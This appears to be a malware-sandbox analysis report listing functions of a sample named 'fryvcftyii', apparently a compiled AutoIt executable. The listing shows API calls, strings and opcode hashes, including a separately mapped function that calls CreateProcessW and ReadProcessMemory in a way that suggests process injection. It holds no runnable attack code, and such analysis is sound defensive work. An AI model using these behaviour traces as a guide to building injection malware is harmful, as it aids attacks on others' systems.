                              • Part of subcall function 003C6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 003C6BAD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _free$CurrentDirectoryLibraryLoad
                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                            • API String ID: 2861923089-1757145024
                            • Opcode ID: f66a5e90dd5df726fa6d15d8597e6b284d502029fc419b99819b4d51d8acfbab
                            • Instruction ID: 1787b3c467c1b6839b44d94e4c9e8ff4ddcbafdc5c3077f14fdf47a991f9a53e
                            • Opcode Fuzzy Hash: f66a5e90dd5df726fa6d15d8597e6b284d502029fc419b99819b4d51d8acfbab
                            • Instruction Fuzzy Hash: E2914A7190022DAFCF06EFA5CC919EDB7B8FF05314B10446AE916EB2A1EB74AD45CB50
                            Function 003C35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExW.KERNEL32 ref: 003C35D4
                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 003C35F5
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C3617
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID: Control Panel\Mouse
                            • API String ID: 3677997916-824357125
                            • Opcode ID: 125b8be940f3d8673e661c80c04010fa892bd6587607115a0096cfe4ea3304a8
                            • Instruction ID: 449a0e80613dd1a291aa16ceefc47e0a24d3ca7690765511d81d0627d8e64f44
                            • Opcode Fuzzy Hash: 125b8be940f3d8673e661c80c04010fa892bd6587607115a0096cfe4ea3304a8
                            • Instruction Fuzzy Hash: 1D115A75514208BFDB218F64DC80EEEB7BCEF45740F018469F805D7210D272AF649764
                            Function 0042955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C4EE5: _fseek.LIBCMT ref: 003C4EFD
                              • Part of subcall function 00429734: _wcscmp.LIBCMT ref: 00429824
                              • Part of subcall function 00429734: _wcscmp.LIBCMT ref: 00429837
                            • _free.LIBCMT ref: 004296A2
                            • _free.LIBCMT ref: 004296A9
                            • _free.LIBCMT ref: 00429714
                              • Part of subcall function 003E2D55: HeapFree.KERNEL32(00000000,00000000), ref: 003E2D69
                              • Part of subcall function 003E2D55: GetLastError.KERNEL32(00000000,?,003E9A24), ref: 003E2D7B
                            • _free.LIBCMT ref: 0042971C
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                            • String ID:
                            • API String ID: 1552873950-0
                            • Opcode ID: f859ffca5ba2b4a0eea839192ff175ec825e65a9e51aeda56b8df4c59dab3bfe
                            • Instruction ID: 9aaafd673c603f4ee9a1dd100e0502bc50dc88252ecce3cf4cf72703b5edb490
                            • Opcode Fuzzy Hash: f859ffca5ba2b4a0eea839192ff175ec825e65a9e51aeda56b8df4c59dab3bfe
                            • Instruction Fuzzy Hash: 2A5170B1E04268AFDF259F65DC81A9EBBB9EF48300F10059EF209A7241DB755E80CF58
                            Function 003E470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                            • String ID:
                            • API String ID: 2782032738-0
                            • Opcode ID: b86a2bf7579e7a03abf9a7817f5cbb14d02551d5049f523e8648adc105e96e29
                            • Instruction ID: b79700752d93154e290bb6f9fb7d2fab89e2f9fdbc3d7744f772bd5d052ed199
                            • Opcode Fuzzy Hash: b86a2bf7579e7a03abf9a7817f5cbb14d02551d5049f523e8648adc105e96e29
                            • Instruction Fuzzy Hash: 3641D874A007E59BDF1A8E6BD88096E77A6AF49360F14833DE425C76C0E771DD408B80
                            Function 003C4C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: AU3!P/E$EA06
                            • API String ID: 4104443479-98412407
                            • Opcode ID: e9553e89324b8c84ae08768e45f43cad42ffec7e9ca14632442108c51ac358cf
                            • Instruction ID: 07329ad40b4734a840d3c1a50ae909a6c490032a62e610f768d30475608ef757
                            • Opcode Fuzzy Hash: e9553e89324b8c84ae08768e45f43cad42ffec7e9ca14632442108c51ac358cf
                            • Instruction Fuzzy Hash: 44414D31A0415867DF23AB648879FBE7FB69B45310F69847DEC83DF283D6209D4483A1
                            Function 003C7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 003FEA39
                            • GetOpenFileNameW.COMDLG32(?), ref: 003FEA83
                              • Part of subcall function 003C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C4743,?,?,003C37AE,?), ref: 003C4770
                              • Part of subcall function 003E0791: GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,003C72BD,00000001,00486290,?,003C3BBB,004852F8,004852E0,?,?), ref: 003E07B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Name$Path$FileFullLongOpen_memset
                            • String ID: X
                            • API String ID: 3777226403-3081909835
                            • Opcode ID: 8d615aba22e0cbb32fd9b64958829a42b7a97931992584df3ce20c71ff4339d6
                            • Instruction ID: cbab838cc0d382f6fe1f58ce946cb79916b0b015fc75d38e594f846a5b58412b
                            • Opcode Fuzzy Hash: 8d615aba22e0cbb32fd9b64958829a42b7a97931992584df3ce20c71ff4339d6
                            • Instruction Fuzzy Hash: A4218171A102589BCB529F94D845BEE7BF8AF49714F00805EE908EB241DFB859898FA1
                            Function 00428D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __fread_nolock_memmove
                            • String ID: EA06
                            • API String ID: 1988441806-3962188686
                            • Opcode ID: 4c3340bc7ab2795f40752c00e09b1ce95b38f97425c2e2cc2f5e8547990469de
                            • Instruction ID: 39e1c17b1146d4b1540e4e9231c8afe9d45c191546432dbf2ae4726a5386b132
                            • Opcode Fuzzy Hash: 4c3340bc7ab2795f40752c00e09b1ce95b38f97425c2e2cc2f5e8547990469de
                            • Instruction Fuzzy Hash: 9A01F9719042687EDB19CAA9C816FFEBBF8DB11311F00469FF552D62C1E978A6088760
                            Function 004298E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                            Download Yara Rule
                            APIs
                            • GetTempPathW.KERNEL32(00000104,?), ref: 004298F8
                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0042990F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Temp$FileNamePath
                            • String ID: aut
                            • API String ID: 3285503233-3010740371
                            • Opcode ID: 0212bbe7f8dfa51a22a1d6d40e3f4c8ea68fa33abe87479301ccdc763f5434cf
                            • Instruction ID: cef893b98a4666300d98ece49b02a46b0ae3c7be79b896cee694b9fb685cef8e
                            • Opcode Fuzzy Hash: 0212bbe7f8dfa51a22a1d6d40e3f4c8ea68fa33abe87479301ccdc763f5434cf
                            • Instruction Fuzzy Hash: 95D05E7958030DABDB50ABA0DC0EFDA773CE704700F0042F1BA54910A1EAB1A5988B99
                            Function 00E92938 Relevance: 5.2, APIs: 3, Instructions: 720processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessW.KERNEL32(?,00000000), ref: 00E93165
                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E931AB
                            Memory Dump Source
                            • Source File: 00000005.00000002.478485424.0000000000E91000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E91000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_e91000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Process$CreateMemoryRead
                            • String ID:
                            • API String ID: 2726527582-0
                            • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                            • Instruction ID: 88aec1312d3db01323ba6e07f32118f17d5c8fcc0602771422df54aa162341b0
                            • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                            • Instruction Fuzzy Hash: 8D62FA34A142589BEB24CFA4C841BDEB376EF58304F1091A9D11DFB3A0E7769E81CB59
                            Function 0043CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bdc116fa4576da9dd870c26d96c95efd13cac5a7c34ad1271a7051c404820e2b
                            • Instruction ID: f57dea3464cfea86d7b82d6111a57a3455128ee9e0c6e6f23e5e964f7fd85506
                            • Opcode Fuzzy Hash: bdc116fa4576da9dd870c26d96c95efd13cac5a7c34ad1271a7051c404820e2b
                            • Instruction Fuzzy Hash: F9F138716083009FCB14DF29C484A6ABBE5FF88318F54892EF8999B391D734E945CF86
                            Function 003C434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 003C4370
                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003C4415
                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003C4432
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: IconNotifyShell_$_memset
                            • String ID:
                            • API String ID: 1505330794-0
                            • Opcode ID: 318ed7fc37a6aab4670a0f95dd1f169f2ddb421bde043e46bb2c3c56f897bb9a
                            • Instruction ID: a9d61b416df2ac6dac69e5856c7930cae799bbab356072d8d4621328534dabd7
                            • Opcode Fuzzy Hash: 318ed7fc37a6aab4670a0f95dd1f169f2ddb421bde043e46bb2c3c56f897bb9a
                            • Instruction Fuzzy Hash: 29318FB45047118FD722DF24D894B9BBBF8FB59308F00093EE69AC6251EB71AD44CB56
                            Function 003E571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __FF_MSGBANNER.LIBCMT ref: 003E5733
                              • Part of subcall function 003EA16B: __NMSG_WRITE.LIBCMT ref: 003EA192
                              • Part of subcall function 003EA16B: __NMSG_WRITE.LIBCMT ref: 003EA19C
                            • __NMSG_WRITE.LIBCMT ref: 003E573A
                              • Part of subcall function 003EA1C8: GetModuleFileNameW.KERNEL32(00000000,004833BA,00000104,?,00000001,00000000), ref: 003EA25A
                              • Part of subcall function 003EA1C8: ___crtMessageBoxW.LIBCMT ref: 003EA308
                              • Part of subcall function 003E309F: ___crtCorExitProcess.LIBCMT ref: 003E30A5
                              • Part of subcall function 003E309F: ExitProcess.KERNEL32 ref: 003E30AE
                              • Part of subcall function 003E8B28: __getptd_noexit.LIBCMT ref: 003E8B28
                            • RtlAllocateHeap.NTDLL(00E00000,00000000,00000001,00000000,?,?,?,003E0DD3,?), ref: 003E575F
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                            • String ID:
                            • API String ID: 1372826849-0
                            • Opcode ID: 6d5f501f911cac1777f21f153a1d4140fdb70ccbe5b568d7591a4133253f35e7
                            • Instruction ID: 2552e5a2d6a1dec783a23818939996fac95b9ebe6c95e8edad526c19b287bb51
                            • Opcode Fuzzy Hash: 6d5f501f911cac1777f21f153a1d4140fdb70ccbe5b568d7591a4133253f35e7
                            • Instruction Fuzzy Hash: E201D235200AB2DAD6132B77AC42A2E77888B82766F120739F409AF2C2DE709C004764
                            Function 004298A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 004298BB
                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00429548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004298D1
                            • CloseHandle.KERNEL32(00000000), ref: 004298D8
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleTime
                            • String ID:
                            • API String ID: 3397143404-0
                            • Opcode ID: 89180467be13de10085a1c617c11728ed7b6fd08ddc7d8358ac9fd998120b116
                            • Instruction ID: 31764a9bd0e47c4cf1e42753cc74373a8cecf5e47b3d6e63b55a386117e55300
                            • Opcode Fuzzy Hash: 89180467be13de10085a1c617c11728ed7b6fd08ddc7d8358ac9fd998120b116
                            • Instruction Fuzzy Hash: D5E08636240224B7D7212F64EC09FCA7B59AB07B60F144130FB14A90E087B12915979C
                            Function 003CA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID: CALL
                            • API String ID: 0-4196123274
                            • Opcode ID: 1cf8a88625c51586793aeeb3cf4bde4bf0dacf0a2c27cb678d0c1cae14637ffd
                            • Instruction ID: d1ae38b62e8acc6a553a7774a9e48f93c99820aa0d9b29947ec65b1c04e1411c
                            • Opcode Fuzzy Hash: 1cf8a88625c51586793aeeb3cf4bde4bf0dacf0a2c27cb678d0c1cae14637ffd
                            • Instruction Fuzzy Hash: F6226770508605CFC726DF24C495F2AB7E1BF84308F15896EE88A9B362D735EC45CB86
                            Function 003C47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            • IsThemeActive.UXTHEME ref: 003C4834
                              • Part of subcall function 003E336C: __lock.LIBCMT ref: 003E3372
                              • Part of subcall function 003E336C: DecodePointer.KERNEL32(00000001,?,003C4849,00417C74), ref: 003E337E
                              • Part of subcall function 003E336C: EncodePointer.KERNEL32(?,?,003C4849,00417C74), ref: 003E3389
                              • Part of subcall function 003C48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000,00000000,?,00E2A300,?,003C485C), ref: 003C4915
                              • Part of subcall function 003C48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,00E2A300,?,003C485C), ref: 003C492A
                              • Part of subcall function 003C3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003C3B68
                              • Part of subcall function 003C3B3A: IsDebuggerPresent.KERNEL32 ref: 003C3B7A
                              • Part of subcall function 003C3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004852F8,004852E0,?,?), ref: 003C3BEB
                              • Part of subcall function 003C3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 003C3C6F
                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003C4874
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                            • String ID:
                            • API String ID: 1438897964-0
                            • Opcode ID: 5c26ef026352af6132ee1e644a02efdd4be50832678f845207a37552d8a375c7
                            • Instruction ID: 64c7e90c1a06dbc7e3ae658fdbaf27c458574ffda4ef7cd1cc670cda1a4b930a
                            • Opcode Fuzzy Hash: 5c26ef026352af6132ee1e644a02efdd4be50832678f845207a37552d8a375c7
                            • Instruction Fuzzy Hash: C3119D719083419BC701EF29D809E0EBFE8EF95750F11492EF0409B2B1DBB09948CB9A
                            Function 003C5C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 003C5CC7
                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 003FDD73
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 7158feccd727643de1dedb4ad65676b23ee37e19bcda70ed8bc7a61877cfa1fc
                            • Instruction ID: b4e66684fa8a0d9ecbc49616ff7aa3166e9f9680cf8fcf90a3fa16a98fc286a4
                            • Opcode Fuzzy Hash: 7158feccd727643de1dedb4ad65676b23ee37e19bcda70ed8bc7a61877cfa1fc
                            • Instruction Fuzzy Hash: B1014470144708BEF7265E24CC8AF7636DCAB05768F10C319FBD59A1E0C6B56C998B54
                            Function 003E0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003E571C: __FF_MSGBANNER.LIBCMT ref: 003E5733
                              • Part of subcall function 003E571C: __NMSG_WRITE.LIBCMT ref: 003E573A
                              • Part of subcall function 003E571C: RtlAllocateHeap.NTDLL(00E00000,00000000,00000001,00000000,?,?,?,003E0DD3,?), ref: 003E575F
                            • std::exception::exception.LIBCMT ref: 003E0DEC
                            • __CxxThrowException@8.LIBCMT ref: 003E0E01
                              • Part of subcall function 003E859B: RaiseException.KERNEL32(?,?,?,00479E78,00000000,?,?,?,?,003E0E06,?,00479E78,?,00000001), ref: 003E85F0
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                            • String ID:
                            • API String ID: 3902256705-0
                            • Opcode ID: 946e104992417004f3075e270dcedf6d2bb90d7542d335e12ecfe9be45f032d5
                            • Instruction ID: 1d176c3fefadd8e81e2ffd347d04772ae378b3f777f74ac7267537be3c7e7a70
                            • Opcode Fuzzy Hash: 946e104992417004f3075e270dcedf6d2bb90d7542d335e12ecfe9be45f032d5
                            • Instruction Fuzzy Hash: 63F0F43180027AA6CB16AB9AED019DF77ACDF01311F104627FD089A2C2DFF09A8486D5
